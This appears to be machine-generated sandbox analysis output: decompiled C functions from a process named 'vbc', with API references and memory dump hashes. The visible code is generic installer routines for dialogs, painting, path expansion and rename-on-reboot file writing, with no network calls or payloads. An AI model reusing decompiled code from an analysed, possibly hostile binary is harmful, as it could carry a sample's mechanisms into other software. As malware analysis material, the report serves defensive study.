				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79ff54 =  *0x79ff54 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404631(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x7a6a40;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								_t44 =  &_v8; // 0x7a6a40
								E00404A38(_a4,  *_t44);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
						goto L27;
					} else {
						_t116 =  *0x7a0f60 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A14();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
				}
				_t76 =  *0x7a8ad8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040473A;
				if(_t110 != 2) {
					_v8 = E00404700;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045CA(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045CA(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045FF(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x7a8ab0 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x79ff54 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x79ff54 = 0;
				return 0;
			}


















                                                        0x0040479b
                                                        0x004048c8
                                                        0x00404925
                                                        0x00404929
                                                        0x004049f6
                                                        0x004049f8
                                                        0x004049f8
                                                        0x004049fe
                                                        0x004049fe
                                                        0x00404a01
                                                        0x00000000
                                                        0x00404a08
                                                        0x00404937
                                                        0x0040493d
                                                        0x00404947
                                                        0x00404952
                                                        0x00404955
                                                        0x00404958
                                                        0x00404963
                                                        0x00404966
                                                        0x0040496d
                                                        0x0040497a
                                                        0x0040498b
                                                        0x00404991
                                                        0x00404993
                                                        0x00404999
                                                        0x004049a7
                                                        0x004049ad
                                                        0x004049ad
                                                        0x0040496d
                                                        0x004049b7
                                                        0x00000000
                                                        0x004049c2
                                                        0x004049c6
                                                        0x004049d6
                                                        0x004049d6
                                                        0x004049dc
                                                        0x004049e8
                                                        0x004049e8
                                                        0x00000000
                                                        0x004049ec
                                                        0x004049b7
                                                        0x004048d3
                                                        0x00000000
                                                        0x004048e5
                                                        0x004048ea
                                                        0x004048f0
                                                        0x00000000
                                                        0x00000000
                                                        0x00404919
                                                        0x0040491b
                                                        0x00404920
                                                        0x00000000
                                                        0x00404920
                                                        0x004048d3
                                                        0x004047a1
                                                        0x004047a4
                                                        0x004047a9
                                                        0x004047ba
                                                        0x004047ba
                                                        0x004047c2
                                                        0x004047c5
                                                        0x004047c9
                                                        0x004047cc
                                                        0x004047d0
                                                        0x004047d3
                                                        0x004047d6
                                                        0x004047d9
                                                        0x004047e0
                                                        0x004047e2
                                                        0x004047e2
                                                        0x004047ec
                                                        0x004047f9
                                                        0x00404803
                                                        0x00404808
                                                        0x0040480b
                                                        0x00404810
                                                        0x00404827
                                                        0x0040482e
                                                        0x00404841
                                                        0x00404844
                                                        0x00404858
                                                        0x0040485f
                                                        0x00404864
                                                        0x00404869
                                                        0x00404869
                                                        0x00404877
                                                        0x00404885
                                                        0x00404897
                                                        0x0040489c
                                                        0x004048ac
                                                        0x004048ae
                                                        0x00000000

                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040483B
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
                                                        • GetSysColor.USER32 ref: 00404869
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
                                                        • lstrlenW.KERNEL32(?), ref: 0040488A
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404905
                                                        • SendMessageW.USER32(00000000), ref: 0040490C
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404937
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
                                                        • LoadCursorW.USER32 ref: 00404988
                                                        • SetCursor.USER32(00000000), ref: 0040498B
                                                        • LoadCursorW.USER32 ref: 004049A4
                                                        • SetCursor.USER32(00000000), ref: 004049A7
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: @jz$N
                                                        • API String ID: 3103080414-4087404676
                                                        • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                                                        • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
                                                        • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                                                        • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004062B4 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004062B4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a5628 = 0x55004e;
				 *0x7a562c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5e28
					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
						_t53 = _t52 + 0x10;
						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406119(_t24 + _t46, 0x7a5228, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00406210(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040615E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                        0x004062b4
                                                        0x004062bd
                                                        0x004062c4
                                                        0x004062ce
                                                        0x004062e2
                                                        0x0040630a
                                                        0x00406311
                                                        0x00406315
                                                        0x00406319
                                                        0x00406339
                                                        0x00406340
                                                        0x0040634a
                                                        0x00406357
                                                        0x0040635c
                                                        0x00406361
                                                        0x00406365
                                                        0x00406374
                                                        0x00406376
                                                        0x00406383
                                                        0x00406387
                                                        0x00406422
                                                        0x00000000
                                                        0x0040639d
                                                        0x004063aa
                                                        0x004063ce
                                                        0x004063d2
                                                        0x004063f1
                                                        0x004063f5
                                                        0x004063f5
                                                        0x004063f7
                                                        0x00406400
                                                        0x0040640b
                                                        0x00406416
                                                        0x0040641c
                                                        0x00000000
                                                        0x0040641c
                                                        0x004063d4
                                                        0x004063d7
                                                        0x004063e2
                                                        0x004063de
                                                        0x004063e0
                                                        0x004063e1
                                                        0x004063e1
                                                        0x004063e9
                                                        0x004063eb
                                                        0x00000000
                                                        0x004063eb
                                                        0x004063b5
                                                        0x004063bb
                                                        0x00000000
                                                        0x004063bb
                                                        0x00406387
                                                        0x00406365
                                                        0x004062e4
                                                        0x004062ef
                                                        0x004062f8
                                                        0x004062fc
                                                        0x00000000
                                                        0x00000000
                                                        0x004062fc
                                                        0x0040642d

                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000), ref: 004062EF
                                                        • GetShortPathNameW.KERNEL32 ref: 004062F8
                                                          • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                                                          • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                                                        • GetShortPathNameW.KERNEL32 ref: 00406315
                                                        • wsprintfA.USER32 ref: 00406333
                                                        • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
                                                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
                                                        • GlobalFree.KERNEL32(00000000), ref: 0040641C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00406423
                                                          • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                                          • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
                                                        • API String ID: 2171350718-2000197835
                                                        • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                                                        • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
                                                        • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                                                        • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8ab0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                        0x0040100a
                                                        0x00401039
                                                        0x00401047
                                                        0x0040104d
                                                        0x00401051
                                                        0x0040105b
                                                        0x00401061
                                                        0x00401064
                                                        0x004010f3
                                                        0x00401089
                                                        0x0040108c
                                                        0x004010a6
                                                        0x004010bd
                                                        0x004010cc
                                                        0x004010cf
                                                        0x004010d5
                                                        0x004010d9
                                                        0x004010e4
                                                        0x004010ed
                                                        0x004010ef
                                                        0x004010ef
                                                        0x00401100
                                                        0x00401105
                                                        0x0040110d
                                                        0x00401110
                                                        0x00401112
                                                        0x00401118
                                                        0x0040111f
                                                        0x00401126
                                                        0x00401130
                                                        0x00401142
                                                        0x00401156
                                                        0x00401160
                                                        0x00401165
                                                        0x00401165
                                                        0x00401110
                                                        0x0040116e
                                                        0x00000000
                                                        0x00401178
                                                        0x00401010
                                                        0x00401013
                                                        0x00401015
                                                        0x0040101f
                                                        0x0040101f
                                                        0x00000000

                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32 ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32 ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                                                        • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
                                                        • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                                                        • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004066AB Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8ad8 + _t44 * 2;
				_t45 = 0x7a6a40;
				_t108 = 0x7a6a40;
				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040666E(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a40;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E004065B5(_t108,  *0x7a8aa8);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068F5(_t108);
							}
							goto L38;
						}
						if( *0x7a8b24 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8aa4;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066AB(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                        0x004066ab
                                                        0x004066ab
                                                        0x004066ab
                                                        0x004066b1
                                                        0x004066b6
                                                        0x004066c7
                                                        0x004066c7
                                                        0x004066cf
                                                        0x004066d0
                                                        0x004066d1
                                                        0x004066d2
                                                        0x004066d5
                                                        0x004066dd
                                                        0x004066df
                                                        0x004066f0
                                                        0x004066f3
                                                        0x004066f3
                                                        0x004066f7
                                                        0x004066fd
                                                        0x00406700
                                                        0x004068db
                                                        0x004068db
                                                        0x004068e6
                                                        0x004068f2
                                                        0x004068f2
                                                        0x00000000
                                                        0x00406706
                                                        0x0040670b
                                                        0x00406720
                                                        0x00406721
                                                        0x00406727
                                                        0x004068b9
                                                        0x004068c7
                                                        0x004068ca
                                                        0x004068ca
                                                        0x004068bb
                                                        0x004068be
                                                        0x004068c1
                                                        0x004068c3
                                                        0x004068c3
                                                        0x004068cc
                                                        0x004068cc
                                                        0x004068d2
                                                        0x004068d5
                                                        0x00406708
                                                        0x00000000
                                                        0x00406708
                                                        0x00000000
                                                        0x004068d5
                                                        0x0040672d
                                                        0x00406730
                                                        0x0040673f
                                                        0x00406746
                                                        0x00406752
                                                        0x00406755
                                                        0x00406758
                                                        0x00406759
                                                        0x0040675e
                                                        0x00406764
                                                        0x00406767
                                                        0x0040676a
                                                        0x0040685d
                                                        0x00406862
                                                        0x00406895
                                                        0x0040689a
                                                        0x0040689f
                                                        0x004068a4
                                                        0x004068a4
                                                        0x004068a9
                                                        0x004068af
                                                        0x004068b2
                                                        0x00000000
                                                        0x004068b2
                                                        0x00406864
                                                        0x00406867
                                                        0x0040686a
                                                        0x0040687f
                                                        0x00406886
                                                        0x0040686c
                                                        0x00406873
                                                        0x00406873
                                                        0x0040688e
                                                        0x00406891
                                                        0x00406855
                                                        0x00406856
                                                        0x00406856
                                                        0x00000000
